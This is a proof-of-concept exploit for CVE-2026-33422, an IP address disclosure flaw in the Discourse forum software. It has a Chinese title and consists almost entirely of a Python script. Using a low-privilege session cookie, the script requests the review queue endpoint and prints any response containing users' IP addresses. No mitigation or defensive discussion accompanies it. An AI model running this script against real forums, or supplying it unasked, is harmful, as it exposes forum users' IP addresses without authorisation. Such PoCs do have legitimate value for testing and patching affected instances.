CVE-2026-33422 Discourse IP地址信息泄露漏洞

# Proof of Concept for CVE-2026-33422 # This script demonstrates how a low-privilege user can access IP addresses # from the review queue without proper authorization. import requests # Configuration TARGET_URL = "https://target-discourse-instance.com" SESSION_COOKIE = "_forum_session=..." # Replace with a valid low-privilege user session def get_review_queue_ips(): headers = { "Cookie": SESSION_COOKIE, "User-Agent": "PoC-Scanner/1.0" } # Access the review queue endpoint # The exact endpoint may vary based on Discourse routing, usually /review or /admin/review review_url = f"{TARGET_URL}/review" try: response = requests.get(review_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Successfully accessed the review queue.") # In a real scenario, parse JSON or HTML to find 'ip_address' fields # Example parsing logic: if "ip_address" in response.text: print("[+] IP address information found in response:") # Extract and print IPs (simplified) print(response.text) else: print("[-] No IP address exposed in the raw response (might be in JSON payload).") else: print(f"[-] Failed to access queue. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": get_review_queue_ips()